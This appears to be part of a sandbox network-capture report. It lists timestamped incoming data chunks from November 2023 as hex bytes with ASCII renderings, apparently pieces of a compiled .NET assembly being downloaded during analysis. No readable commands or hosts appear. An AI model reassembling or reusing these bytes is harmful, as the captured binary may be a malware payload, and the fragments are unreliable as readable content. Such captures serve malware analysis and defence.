28 3e 00 00 0a Data Ascii: p(>o\|&orTp(>o\|&orTp(>o\|&orUp(>o\|&or&Up(>o\|&or6Up(>o\|&orXUp(>o\|&orUp(>o\|&orUp(>o\|&orUp(>
2023-11-18 09:02:34 UTC	65	IN	Data Raw: ee 01 00 06 02 7b 53 01 00 04 2d 1b 02 7b 41 01 00 04 2c 0c 02 7b 41 01 00 04 14 6f 38 01 00 06 02 14 7d 5a 01 00 04 2a 00 13 30 03 00 47 00 00 00 00 00 00 00 02 28 24 02 00 06 02 7b 54 01 00 04 2d 31 02 02 fe 06 b3 02 00 06 73 c5 02 00 06 7d 5b 01 00 04 02 7b 41 01 00 04 2c 17 02 7b 41 01 00 04 02 7b 4f 01 00 04 02 7b 5b 01 00 04 6f 39 01 00 06 02 03 28 ef 01 00 06 2a ca 02 28 24 02 00 06 02 03 28 f0 01 00 06 02 7b 54 01 00 04 2d 1c 02 7b 41 01 00 04 2c 0d 02 7b 41 01 00 04 16 14 6f 39 01 00 06 02 14 7d 5b 01 00 04 2a 00 00 13 30 03 00 41 00 00 00 00 00 00 00 02 28 24 02 00 06 02 7b 55 01 00 04 2d 2b 02 02 fe 06 b4 02 00 06 73 c9 02 00 06 7d 5c 01 00 04 02 7b 41 01 00 04 2c 11 02 7b 41 01 00 04 02 7b 5c 01 00 04 6f 3a 01 00 06 02 03 28 f1 01 00 06 2a c6 Data Ascii: {S-{A,{Ao8}Z0G(${T-1s}[{A,{A{O{[o9(($({T-{A,{Ao9}[0A(${U-+s}\{A,{A{\o:(
2023-11-18 09:02:34 UTC	67	IN	Data Raw: 00 04 2a 00 1b 30 07 00 63 00 00 00 82 00 00 11 02 7b 58 01 00 04 2c 18 02 7b 58 01 00 04 02 04 15 28 6d 03 00 06 73 05 03 00 06 6f f6 02 00 06 de 40 0a 02 7b 46 01 00 04 28 3a 05 00 06 2c 2b 20 00 15 13 80 28 57 00 00 0a 72 d8 56 00 70 18 8d 1c 00 00 01 25 16 72 62 57 00 70 a2 25 17 06 a2 28 40 05 00 06 28 b4 04 00 06 de 03 26 de 00 de 00 2a 00 01 1c 00 00 00 00 23 00 3a 5d 00 03 1c 00 00 01 00 00 00 00 22 22 00 40 32 00 00 01 13 30 03 00 41 00 00 00 00 00 00 00 02 28 24 02 00 06 02 7b 59 01 00 04 2d 2b 02 02 fe 06 be 02 00 06 73 dd 02 00 06 7d 60 01 00 04 02 7b 41 01 00 04 2c 11 02 7b 41 01 00 04 02 7b 60 01 00 04 6f 3f 01 00 06 02 03 28 f9 01 00 06 2a c6 02 28 24 02 00 06 02 03 28 fa 01 00 06 02 7b 59 01 00 04 2d 1b 02 7b 41 01 00 04 2c 0c 02 7b 41 01 Data Ascii: 0c{X,{X(mso@{F(:,+ (WrVp%rbWp%(@(&#:]""@20A(${Y-+s}`{A,{A{`o?(*($({Y-{A,{A
2023-11-18 09:02:34 UTC	71	IN	Data Raw: 30 03 00 3e 00 00 00 6c 00 00 11 02 72 84 5a 00 70 12 00 6f d3 01 00 0a 2c 2d 06 75 21 00 00 01 2c 07 06 a5 21 00 00 01 2a 06 2c 1b d0 21 00 00 01 28 3e 00 00 0a 28 d6 01 00 0a 06 6f d7 01 00 0a a5 21 00 00 01 2a 16 2a 4a 02 72 84 5a 00 70 03 8c 21 00 00 01 6f d5 01 00 0a 2a 00 00 00 13 30 03 00 2a 00 00 00 6c 00 00 11 02 72 9e 5a 00 70 12 00 6f d3 01 00 0a 2c 19 06 75 bd 00 00 01 2c 07 06 74 bd 00 00 01 2a 06 2c 07 06 6f 56 00 00 0a 2a 14 2a 36 02 72 9e 5a 00 70 03 6f d5 01 00 0a 2a 13 30 03 00 2a 00 00 00 6c 00 00 11 02 72 c8 5a 00 70 12 00 6f d3 01 00 0a 2c 19 06 75 bd 00 00 01 2c 07 06 74 bd 00 00 01 2a 06 2c 07 06 6f 56 00 00 0a 2a 14 2a 36 02 72 c8 5a 00 70 03 6f d5 01 00 0a 2a 13 30 03 00 38 00 00 00 6c 00 00 11 02 72 e6 5a 00 70 12 00 6f d3 01 00 Data Ascii: 0>lrZpo,-u!,!,!(>(o!JrZp!o0lrZpo,u,t,oV*6rZpo0lrZpo,u,t,oV*6rZpo08lrZpo
2023-11-18 09:02:34 UTC	73	IN	Data Raw: eb 01 00 0a 13 06 de 00 11 06 2a 00 01 10 00 00 00 00 b3 00 2a dd 00 17 1c 00 00 01 13 30 04 00 a6 00 00 00 91 00 00 11 0f 00 28 f5 01 00 0a 0a 0f 00 28 f6 01 00 0a 0b 0f 00 28 f7 01 00 0a 0c 07 18 30 09 06 17 59 0a 07 1f 0c 58 0b 06 1f 64 5b 0d 18 09 59 09 1a 5b 58 13 04 20 ad 8e 00 00 06 20 6c 12 00 00 58 5a 1f 64 5b 20 51 ab 04 00 07 17 58 5a 20 10 27 00 00 5b 13 05 11 05 58 08 58 11 04 58 6c 23 00 00 00 00 00 d2 97 40 59 23 00 00 00 00 70 99 94 41 5a 6a 0f 00 28 f9 01 00 0a 20 80 ee 36 00 5a 0f 00 28 fa 01 00 0a 20 60 ea 00 00 5a 58 0f 00 28 fb 01 00 0a 20 e8 03 00 00 5a 58 0f 00 28 fc 01 00 0a 58 6a 58 2a 66 03 02 7b 95 01 00 04 02 7b 96 01 00 04 02 7b 97 01 00 04 28 75 03 00 06 2a 13 30 05 00 0c 01 00 00 00 00 00 00 03 45 06 00 00 00 05 00 00 00 af Data Ascii: *0(((0YXd[Y[X lXZd[ QXZ '[XXXl#@Y#pAZj( 6Z( `ZX( ZX(XjXf{{{(u*0E
2023-11-18 09:02:34 UTC	77	IN	Data Raw: 1f 09 17 73 a7 03 00 06 a2 25 1f 43 72 bc 63 00 70 1f 14 17 73 a7 03 00 06 a2 25 1f 44 72 dc 63 00 70 18 16 73 a7 03 00 06 a2 25 1f 45 72 fe 63 00 70 1f 12 16 73 a7 03 00 06 a2 25 1f 46 72 22 64 00 70 1f 13 16 73 a7 03 00 06 a2 25 1f 47 72 46 64 00 70 1f 14 16 73 a7 03 00 06 a2 25 1f 48 72 6a 64 00 70 17 16 73 a7 03 00 06 a2 25 1f 49 72 7e 64 00 70 16 17 73 a7 03 00 06 a2 25 1f 4a 72 8e 64 00 70 16 16 73 a7 03 00 06 a2 25 1f 4b 72 a0 64 00 70 19 16 73 a7 03 00 06 a2 73 a0 03 00 06 2a 76 02 1f 10 30 0a 02 2c 11 02 1f 10 2e 0c 2b 0c 02 1f 16 2e 05 02 1f 17 33 02 17 2a 16 2a 6e 02 75 bd 00 00 01 2c 07 02 74 bd 00 00 01 2a 02 2c 07 02 6f 56 00 00 0a 2a 14 2a 00 00 1b 30 04 00 9b 00 00 00 9d 00 00 11 02 2d 04 16 6a 2b 06 02 6f 65 02 00 06 20 00 00 00 08 6a 28 Data Ascii: s%Crcps%Drcps%Ercps%Fr"dps%GrFdps%Hrjdps%Ir~dps%Jrdps%Krdpssv0,.+.3nu,t,oV**0-j+oe j(
2023-11-18 09:02:34 UTC	81	IN	Data Raw: 00 00 02 00 9d 00 11 ae 00 0f 00 00 00 00 22 02 16 7d 1d 02 00 04 2a 00 00 00 1b 30 0c 00 2c 01 00 00 00 00 00 00 02 28 c4 03 00 06 02 28 f7 03 00 06 1f 0e 14 14 02 7b 0f 02 00 04 02 14 14 1d 8d 1c 00 00 01 25 16 02 7b 19 02 00 04 8c 48 00 00 01 a2 25 17 02 7b 13 02 00 04 8c b5 00 00 01 a2 25 18 02 7b 14 02 00 04 8c b5 00 00 01 a2 25 19 02 7b 16 02 00 04 8c b5 00 00 01 a2 25 1a 02 7b 15 02 00 04 8c b5 00 00 01 a2 25 1b 02 7b 1a 02 00 04 8c b3 00 00 01 a2 25 1c 02 7b 1b 02 00 04 8c b3 00 00 01 a2 73 e6 01 00 06 28 09 02 00 06 02 7b 0f 02 00 04 2c 5f 02 7b 1d 02 00 04 2c 0d 02 6f e9 00 00 0a 2d f8 de 03 26 de 00 02 7b 0f 02 00 04 6f 93 01 00 06 de 3d 02 7b 19 02 00 04 1f 20 5f 2c 1d 02 7b 0f 02 00 04 6f 81 01 00 06 2c 10 02 7b 0f 02 00 04 6f 81 01 00 06 6f Data Ascii: "}*0,(({%{H%{%{%{%{%{%{s({,_{,o-&{o={ _,{o,{oo
2023-11-18 09:02:34 UTC	85	IN	Data Raw: 00 02 28 c4 03 00 06 03 02 28 cf 03 00 06 32 1c 02 7b 1c 02 00 04 2c 14 02 7b 1c 02 00 04 03 02 28 cf 03 00 06 59 6f 88 04 00 06 2a 02 7b 12 02 00 04 7b ea 02 00 04 02 7b 12 02 00 04 03 6f ff 00 00 06 2a 00 13 30 03 00 43 00 00 00 00 00 00 00 02 28 c4 03 00 06 03 02 28 cf 03 00 06 32 1c 02 7b 1c 02 00 04 2c 14 02 7b 1c 02 00 04 03 02 28 cf 03 00 06 59 6f 89 04 00 06 2a 02 7b 12 02 00 04 7b ea 02 00 04 02 7b 12 02 00 04 03 6f 00 01 00 06 2a 00 13 30 03 00 43 00 00 00 00 00 00 00 02 28 c4 03 00 06 03 02 28 cf 03 00 06 32 1c 02 7b 1c 02 00 04 2c 14 02 7b 1c 02 00 04 03 02 28 cf 03 00 06 59 6f 8a 04 00 06 2a 02 7b 12 02 00 04 7b ea 02 00 04 02 7b 12 02 00 04 03 6f fe 00 00 06 2a 00 13 30 03 00 a2 00 00 00 1b 00 00 11 02 28 c4 03 00 06 02 7b 1b 02 00 04 26 02 Data Ascii: ((2{,{(Yo{{{o0C((2{,{(Yo{{{o0C((2{,{(Yo{{{o0({&
2023-11-18 09:02:34 UTC	89	IN	Data Raw: 7b 12 02 00 04 7b ea 02 00 04 02 7b 12 02 00 04 03 6f 0f 01 00 06 28 f8 03 00 06 0a 02 7b 12 02 00 04 7b ea 02 00 04 02 7b 12 02 00 04 02 7b 10 02 00 04 03 06 6f 44 01 00 06 2a 00 13 30 04 00 2f 00 00 00 1d 00 00 11 02 28 c4 03 00 06 02 6f eb 00 00 0a 0a 03 8e 69 06 2f 04 03 8e 69 0a 16 0b 2b 0e 03 07 02 07 6f a9 01 00 0a a2 07 17 58 0b 07 06 32 ee 06 2a 00 13 30 03 00 77 00 00 00 b3 00 00 11 02 28 c4 03 00 06 02 7b 12 02 00 04 2c 0d 02 7b 12 02 00 04 7b ea 02 00 04 2d 06 73 44 01 00 0a 7a 02 28 cf 03 00 06 0a 06 73 76 02 00 0a 0b 16 0c 2b 3e 02 7b 12 02 00 04 7b ea 02 00 04 02 7b 12 02 00 04 08 6f fa 00 00 06 0d 02 7b 12 02 00 04 7b ea 02 00 04 02 7b 12 02 00 04 08 6f 0f 01 00 06 13 04 07 09 11 04 6f 77 02 00 0a 08 17 58 0c 08 06 32 be 07 2a 00 13 30 02 Data Ascii: {{{o({{{{oD0/(oi/i+oX20w({,{{-sDz(sv+>{{{o{{{oowX2*0
2023-11-18 09:02:34 UTC	93	IN	Data Raw: 97 02 00 04 03 6f 27 01 00 06 2a 04 6f 7d 00 00 0a 0a 06 d0 2c 00 00 01 28 3e 00 00 0a 28 c1 00 00 0a 2c 1e 02 7b 97 02 00 04 03 02 7b 97 02 00 04 04 a5 2c 00 00 01 6f 7d 03 00 06 6f 28 01 00 06 2a 04 75 32 00 00 01 0b 07 2c 13 02 7b 97 02 00 04 03 07 6f 93 02 00 0a 6f 24 01 00 06 2a 06 02 7b 99 02 00 04 28 91 03 00 06 0c 08 17 59 45 05 00 00 00 0e 00 00 00 26 00 00 00 3e 00 00 00 51 00 00 00 01 00 00 00 2a 02 7b 97 02 00 04 03 6f 27 01 00 06 2a 02 7b 97 02 00 04 03 04 28 57 00 00 0a 28 94 02 00 0a 6f 26 01 00 06 2a 02 7b 97 02 00 04 03 04 28 57 00 00 0a 28 95 02 00 0a 6f 23 01 00 06 2a 02 7b 97 02 00 04 03 04 6f 56 00 00 0a 6f 28 01 00 06 2a 02 7b 97 02 00 04 03 04 74 17 00 00 1b 6f 22 01 00 06 2a 00 00 00 1b 30 07 00 5f 00 00 00 82 00 00 11 02 03 7d 9f Data Ascii: o'o},(>(,{{,o}o(u2,{oo${(YE&>Q{o'{(W(o&{(W(o#{oVo({to"*0_}
2023-11-18 09:02:34 UTC	97	IN	Data Raw: 00 00 01 25 16 12 0e 28 b9 02 00 0a a2 25 18 11 10 a2 6f 77 01 00 0a 13 12 16 13 13 2b 7f 11 12 6f 0d 01 00 0a 6f 0e 01 00 0a 13 06 2b 49 11 06 6f 39 00 00 0a 74 55 00 00 01 13 14 11 13 2d 19 11 14 72 4b 47 00 70 6f f2 00 00 0a a5 b3 00 00 01 2c 06 11 14 13 11 de 3e 11 13 17 33 19 11 14 72 91 47 00 70 6f f2 00 00 0a a5 b3 00 00 01 2c 06 11 14 13 11 de 20 11 06 6f 55 00 00 0a 2d ae de 15 11 06 75 34 00 00 01 13 08 11 08 2c 07 11 08 6f 45 00 00 0a dc 11 13 17 58 13 13 11 13 18 2f 07 11 11 39 75 ff ff ff 11 11 2d 19 12 0e 28 b7 02 00 0a 11 0f 6f ba 02 00 0a 11 0f 17 59 13 0f dd 1d 03 00 00 03 72 70 4d 00 70 19 8d bd 00 00 01 25 16 12 0e 28 b9 02 00 0a a2 25 18 11 10 a2 6f 77 01 00 0a 13 15 06 12 0e 28 b9 02 00 0a 6f bb 02 00 0a 13 16 11 15 6f 0d 01 00 0a 16 Data Ascii: %(%ow+oo+Io9tU-rKGpo,>3rGpo, oU-u4,oEX/9u-(oYrpMp%(%ow(oo
2023-11-18 09:02:34 UTC	101	IN	Data Raw: 8f ac 00 00 02 7b fb 03 00 04 2c 2d 02 7b be 02 00 04 03 8f ac 00 00 02 7b fb 03 00 04 7b 01 04 00 04 02 7b be 02 00 04 03 8f ac 00 00 02 7b fc 03 00 04 6f a9 01 00 0a 2a 02 03 28 9c 04 00 06 2c 06 7e 8b 00 00 0a 2a 02 03 28 99 04 00 06 8c c3 00 00 01 2a 00 00 00 13 30 04 00 89 00 00 00 00 00 00 00 02 7b be 02 00 04 03 8f ac 00 00 02 7b fa 03 00 04 15 33 02 17 2a 02 03 28 82 04 00 06 02 7b be 02 00 04 03 8f ac 00 00 02 7b fb 03 00 04 2c 2d 02 7b be 02 00 04 03 8f ac 00 00 02 7b fb 03 00 04 7b 01 04 00 04 02 7b be 02 00 04 03 8f ac 00 00 02 7b fc 03 00 04 6f aa 01 00 0a 2a 02 7b bf 02 00 04 7b ea 02 00 04 02 7b bf 02 00 04 02 7b be 02 00 04 03 8f ac 00 00 02 7b fa 03 00 04 6f 43 01 00 06 16 6a fe 01 2a 00 00 00 1b 30 04 00 b7 02 00 00 d0 00 00 11 14 0a 16 Data Ascii: {,-{{{{{o(,~(0{{3({{,-{{{{{o{{{{{oCj0
2023-11-18 09:02:34 UTC	105	IN	Data Raw: 26 07 17 58 0b 07 06 32 e5 2a 4e 02 17 7d e9 02 00 04 02 7b e8 02 00 04 6f f3 02 00 0a 2a 3a 02 03 6f ed 02 00 0a 15 fe 01 16 fe 01 2a 4a 02 7b e8 02 00 04 03 74 63 00 00 02 6f f4 02 00 0a 2a 1a 73 8c 00 00 0a 7a 32 02 7b e8 02 00 04 6f ee 02 00 0a 2a 36 02 03 6f f5 02 00 0a 74 63 00 00 02 2a 26 02 03 04 6f f6 02 00 0a 2a 36 02 03 6f f7 02 00 0a 74 63 00 00 02 2a 26 02 03 04 6f f0 02 00 0a 2a 3a 02 02 03 6f ed 02 00 0a 6f f7 02 00 0a 2a 36 02 7b e8 02 00 04 03 6f f8 02 00 0a 2a 00 00 13 30 03 00 36 00 00 00 1d 00 00 11 02 7b e8 02 00 04 6f ee 02 00 0a 0a 16 0b 2b 20 03 02 7b e8 02 00 04 07 6f f8 02 00 0a 6f e1 02 00 0a 1b 28 77 00 00 0a 2d 02 07 2a 07 17 58 0b 07 06 32 dc 15 2a 4a 02 7b e8 02 00 04 03 74 63 00 00 02 6f f9 02 00 0a 2a 6a 02 17 7d e9 02 00 Data Ascii: &X2N}{o:oJ{tcosz2{o6otc&o6otc&o:oo6{o06{o+ {oo(w-X2J{tcoj}
2023-11-18 09:02:34 UTC	109	IN	Data Raw: 00 02 02 00 8a 00 32 bc 00 0a 00 00 00 00 00 00 7e 00 4a c8 00 1d 4c 00 00 02 1b 30 03 00 b3 00 00 00 e4 00 00 11 02 7c f8 02 00 04 14 28 0e 00 00 2b 0a 06 39 9f 00 00 00 02 7b f5 02 00 04 2d 36 06 6f 37 02 00 06 0b 07 72 d3 79 00 70 6f a0 00 00 0a 07 6f 1d 01 00 0a 26 de 0a 07 2c 06 07 6f 45 00 00 0a dc 06 16 7d 38 01 00 04 de 69 26 03 2c 02 fe 1a de 61 00 06 6f 37 02 00 06 0c 02 7b f6 02 00 04 28 6f 00 00 0a 2c 0b 72 61 7a 00 70 73 02 04 00 06 7a 08 72 a7 7a 00 70 02 7b f6 02 00 04 28 10 03 00 0a 6f a0 00 00 0a 08 6f 1d 01 00 0a 26 de 0a 08 2c 06 08 6f 45 00 00 0a dc 06 25 7b 38 01 00 04 17 59 7d 38 01 00 04 de 08 26 03 2c 02 fe 1a de 00 2a 00 01 34 00 00 02 00 22 00 14 36 00 0a 00 00 00 00 00 00 1b 00 2e 49 00 08 1c 00 00 01 02 00 59 00 37 90 00 0a 00 Data Ascii: 2~JL0\|(+9{-6o7rypoo&,oE}8i&,ao7{(o,razpszrzp{(oo&,oE%{8Y}8&,*4"6.IY7
2023-11-18 09:02:34 UTC	113	IN	Data Raw: cc 83 00 70 6f 23 03 00 0a 7e 1c 03 00 04 72 d8 83 00 70 72 e6 83 00 70 6f 23 03 00 0a 7e 1c 03 00 04 72 ee 83 00 70 72 e6 83 00 70 6f 23 03 00 0a 7e 1c 03 00 04 72 fa 83 00 70 72 04 84 00 70 6f 23 03 00 0a 7e 1c 03 00 04 72 14 84 00 70 72 1c 84 00 70 6f 23 03 00 0a 7e 23 03 00 04 7e 3c 00 00 0a 28 66 00 00 0a 2c 27 14 0c 14 0d 16 13 04 12 02 12 03 12 04 28 65 05 00 06 26 08 09 11 04 7f 22 03 00 04 7f 23 03 00 04 28 6a 05 00 06 26 de 0a 07 2c 06 06 28 60 00 00 0a dc 2a 00 00 41 34 00 00 02 00 00 00 0d 00 00 00 20 00 00 00 2d 00 00 00 0a 00 00 00 00 00 00 00 02 00 00 00 52 00 00 00 01 02 00 00 53 02 00 00 0a 00 00 00 00 00 00 00 5e 02 2c 0d 03 2c 08 02 03 28 75 01 00 0a 2a 02 2a 03 2c 02 03 2a 14 2a 1b 30 02 00 29 00 00 00 5c 00 00 11 7e 1a 03 00 04 0a 16 Data Ascii: po#~rprpo#~rprpo#~rprpo#~rprpo#~#~<(f,'(e&"#(j&,(`A4 -RS^,,(u,*0)\~
2023-11-18 09:02:34 UTC	117	IN	Data Raw: 00 0b 00 27 32 00 03 4c 00 00 02 02 00 0b 00 2a 35 00 07 00 00 00 00 1e 02 7b 25 03 00 04 2a 46 02 7b 38 03 00 0a 7e 3c 00 00 0a 28 66 00 00 0a 2a 56 02 28 33 06 00 06 02 03 7d 26 03 00 04 02 04 28 39 03 00 0a 2a 1b 30 02 00 38 00 00 00 12 00 00 11 02 7c 38 03 00 0a 7e 3c 00 00 0a 28 3b 03 00 0a 0a 06 7e 3c 00 00 0a 28 3d 00 00 0a 2c 0c 02 7b 26 03 00 04 06 28 54 01 00 06 de 0a 26 de 07 02 28 be 00 00 0a dc 17 2a 01 1c 00 00 00 00 00 00 2c 2c 00 03 4c 00 00 02 02 00 00 00 2f 2f 00 07 00 00 00 00 56 02 28 38 06 00 06 02 03 7d 27 03 00 04 02 04 28 39 03 00 0a 2a 00 00 1b 30 02 00 38 00 00 00 12 00 00 11 02 7c 38 03 00 0a 7e 3c 00 00 0a 28 3b 03 00 0a 0a 06 7e 3c 00 00 0a 28 3d 00 00 0a 2c 0c 02 7b 27 03 00 04 06 28 52 01 00 06 de 0a 26 de 07 02 28 be 00 00 Data Ascii: '2L5{%F{8~<(fV(3}&(908\|8~<(;~<(=,{&(T&(,,L//V(8}'(908\|8~<(;~<(=,{'(R&(
2023-11-18 09:02:34 UTC	118	IN	Data Raw: ff 00 00 11 7e 3a 03 00 04 0a 16 0b 06 12 01 28 5f 00 00 0a 7e 46 03 00 04 39 9d 00 00 00 16 0c 7e 46 03 00 04 6f 2f 03 00 0a 0d 2b 41 12 03 28 30 03 00 0a 13 04 12 04 28 38 01 00 0a 13 05 11 05 28 6f 00 00 0a 2d 26 00 11 05 14 28 4d 03 00 0a de 17 13 06 72 6e 90 00 70 11 05 11 06 28 4e 03 00 0a 28 3d 01 00 0a de 00 08 17 58 0c 12 03 28 32 03 00 0a 2d b6 de 0e 12 03 fe 16 4e 00 00 1b 6f 45 00 00 0a dc 72 d0 90 00 70 08 8c b5 00 00 01 28 6f 01 00 0a 6f 4f 03 00 0a 8c b5 00 00 01 28 4e 03 00 0a 28 3d 01 00 0a 7e 46 03 00 04 6f 50 03 00 0a 14 80 46 03 00 04 de 0a 07 2c 06 06 28 60 00 00 0a dc 2a 01 28 00 00 00 00 45 00 0a 4f 00 17 32 00 00 01 02 00 27 00 4e 75 00 0e 00 00 00 00 02 00 08 00 b1 b9 00 0a 00 00 00 00 13 30 03 00 58 00 00 00 00 01 00 11 28 6f 01 Data Ascii: ~:(_~F9~Fo/+A(0(8(o-&(Mrnp(N(=X(2-NoErp(ooO(N(=~FoPF,(`*(EO2'Nu0X(o
2023-11-18 09:02:34 UTC	122	IN	Data Raw: 00 00 0a 2c 0c 07 28 f8 06 00 06 7e 3c 00 00 0a 0b dc 06 2a 00 00 00 41 1c 00 00 02 00 00 00 1f 00 00 00 07 01 00 00 26 01 00 00 75 00 00 00 00 00 00 00 13 30 03 00 ed 00 00 00 08 01 00 11 02 7e 3c 00 00 0a 28 66 00 00 0a 2c 01 2a 16 0a 06 1a 28 5c 00 00 0a 28 0b 07 00 06 0a 02 06 28 0f 07 00 06 0b 06 0c 06 28 5c 00 00 0a 1a 28 0b 07 00 06 0a 06 1a 28 5c 00 00 0a 28 0b 07 00 06 0a 02 06 28 0f 07 00 06 0d 06 13 04 06 28 5c 00 00 0a 28 5c 00 00 0a 28 0b 07 00 06 0a 02 06 28 0f 07 00 06 13 05 06 13 06 11 05 7e 3c 00 00 0a 28 3d 00 00 0a 2c 18 11 05 28 f8 06 00 06 7e 3c 00 00 0a 13 05 02 11 06 11 05 28 13 07 00 06 09 7e 3c 00 00 0a 28 3d 00 00 0a 2c 15 09 28 f8 06 00 06 7e 3c 00 00 0a 0d 02 11 04 09 28 13 07 00 06 07 7e 3c 00 00 0a 28 3d 00 00 0a 2c 14 07 28 Data Ascii: ,(~<A&u0~<(f,(\(((\((\(((\(\((~<(=,(~<(~<(=,(~<(~<(=,(
2023-11-18 09:02:34 UTC	126	IN	Data Raw: fe 07 73 06 00 06 73 01 09 00 06 7d 39 04 00 04 38 fa 01 00 00 02 7c 88 03 00 04 02 fe 06 42 07 00 06 73 ad 08 00 06 7d 24 04 00 04 02 7c 88 03 00 04 02 fe 06 43 07 00 06 73 b1 08 00 06 7d 25 04 00 04 02 7c 88 03 00 04 02 fe 06 44 07 00 06 73 b5 08 00 06 7d 26 04 00 04 02 7c 88 03 00 04 02 fe 06 45 07 00 06 73 b9 08 00 06 7d 27 04 00 04 02 7c 88 03 00 04 02 fe 06 46 07 00 06 73 bd 08 00 06 7d 28 04 00 04 02 7c 88 03 00 04 02 fe 06 47 07 00 06 73 c1 08 00 06 7d 29 04 00 04 02 7c 88 03 00 04 02 fe 06 48 07 00 06 73 c5 08 00 06 7d 2a 04 00 04 02 7c 88 03 00 04 02 fe 06 49 07 00 06 73 c9 08 00 06 7d 2b 04 00 04 02 7c 88 03 00 04 02 fe 06 4a 07 00 06 73 cd 08 00 06 7d 2c 04 00 04 02 7c 88 03 00 04 02 fe 06 4b 07 00 06 73 d1 08 00 06 7d 2d 04 00 04 02 7c 88 03 Data Ascii: ss}98\|Bs}$\|Cs}%\|Ds}&\|Es}'\|Fs}(\|Gs})\|Hs}*\|Is}+\|Js},\|Ks}-\|
2023-11-18 09:02:34 UTC	129	IN	Data Raw: 00 00 0a 2c 0d 02 06 6f 27 07 00 06 7e 3c 00 00 0a 0a dc 06 2a 00 00 00 01 10 00 00 02 00 19 00 2c 45 00 1e 00 00 00 00 8e 28 71 00 00 0a 72 df 95 00 70 18 8d 1c 00 00 01 25 16 03 8c b5 00 00 01 a2 25 17 04 a2 28 40 05 00 06 2a 13 30 04 00 35 00 00 00 18 01 00 11 03 2d 09 05 72 ef 95 00 70 51 17 2a 03 7b 41 01 00 04 0a 06 2d 09 05 72 15 96 00 70 51 17 2a 04 2d 09 05 72 51 96 00 70 51 17 2a 06 02 04 05 6f 2b 01 00 06 2a 00 00 00 13 30 05 00 2d 00 00 00 18 01 00 11 03 2d 0a 0e 04 72 ef 95 00 70 51 17 2a 03 7b 41 01 00 04 0a 06 2d 0a 0e 04 72 15 96 00 70 51 17 2a 06 02 04 05 0e 04 6f 2c 01 00 06 2a 1e 02 7b 8e 03 00 04 2a 22 02 03 7d 8e 03 00 04 2a 1e 02 7b 8f 03 00 04 2a 22 02 03 7d 8f 03 00 04 2a 56 02 03 02 6f 31 07 00 06 02 6f 33 07 00 06 04 28 1d 07 00 Data Ascii: ,o'~<,E(qrp%%(@05-rpQ{A-rpQ-rQpQo+0--rpQ{A-rpQo,{"}{"}*Vo1o3(
2023-11-18 09:02:34 UTC	134	IN	Data Raw: 00 06 02 72 4d 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 5b 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 6b 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 7f 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 95 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 a5 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 af 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 bb 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 c9 99 00 70 6f a1 07 00 06 2a 62 02 28 b9 07 00 06 02 02 72 d3 99 00 70 6f a1 07 00 06 6f 9f 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 db 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 e9 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 54 57 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 Data Ascii: rMpoJ(r[poJ(rkpoJ(rpoJ(rpoJ(rpoJ(rpoJ(rpoJ(rpob(rpooJ(rpoJ(rpoJ(rTWpo*J(
2023-11-18 09:02:34 UTC	138	IN	Data Raw: 02 00 11 00 00 00 00 00 00 00 02 16 28 1e 08 00 06 de 07 02 28 14 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 00 00 09 09 00 07 00 00 00 00 5e 02 03 04 17 28 e4 07 00 06 02 05 7d c5 03 00 04 02 28 22 08 00 06 2a 7a 02 7b c6 03 00 04 7e 3c 00 00 0a 28 66 00 00 0a 2c 0b 72 37 a0 00 70 73 bd 00 00 0a 7a 2a 00 13 30 03 00 40 00 00 00 08 00 00 11 02 7b c6 03 00 04 7e 3c 00 00 0a 28 3d 00 00 0a 2c 01 2a 02 28 e7 07 00 06 02 7b c5 03 00 04 28 fa 06 00 06 02 7c c6 03 00 04 28 07 06 00 06 0a 06 2c 0c 06 72 5f a0 00 70 73 01 04 00 06 7a 2a 13 30 03 00 43 00 00 00 00 00 00 00 02 03 7d c8 03 00 04 02 04 7d c9 03 00 04 03 2d 11 02 7b c7 03 00 04 2c 07 02 14 7d c7 03 00 04 14 2a 02 7b c7 03 00 04 2d 12 02 02 fe 06 26 08 00 06 73 9d 08 00 06 7d c7 03 00 04 02 7b c7 03 00 Data Ascii: ((^(}("z{~<(f,r7psz0@{~<(=,({(\|(,r_psz0C}}-{,}{-&s}{
2023-11-18 09:02:34 UTC	142	IN	Data Raw: 16 0d 02 7b db 03 00 04 6f f0 07 00 06 12 00 12 03 12 01 12 02 28 14 06 00 06 13 04 11 04 2c 0d 11 04 72 9d a4 00 70 73 01 04 00 06 7a 02 06 28 fd 06 00 06 7d dc 03 00 04 02 09 73 83 02 00 0a 7d dd 03 00 04 02 07 73 90 03 00 0a 7d de 03 00 04 02 08 16 fe 03 73 6c 00 00 0a 7d df 03 00 04 2a 13 30 04 00 74 00 00 00 36 01 00 11 02 7b e0 03 00 04 2d 6b 02 28 6b 08 00 06 7e 3c 00 00 0a 0a 16 0b 02 7b db 03 00 04 6f f0 07 00 06 12 00 12 01 28 15 06 00 06 0c 08 2c 0c 08 72 c5 a4 00 70 73 01 04 00 06 7a 06 07 28 06 07 00 06 0d 09 2c 2e 02 07 8d b3 00 00 01 7d e0 03 00 04 16 13 04 2b 16 02 7b e0 03 00 04 11 04 09 11 04 91 16 fe 03 9c 11 04 17 58 13 04 11 04 09 8e 69 32 e3 2a 13 30 02 00 44 00 00 00 34 00 00 11 02 7c e1 03 00 04 28 9c 00 00 0a 2d 36 02 28 6b 08 00 Data Ascii: {o(,rpsz(}s}s}sl}0t6{-k(k~<{o(,rpsz(,.}+{Xi20D4\|(-6(k
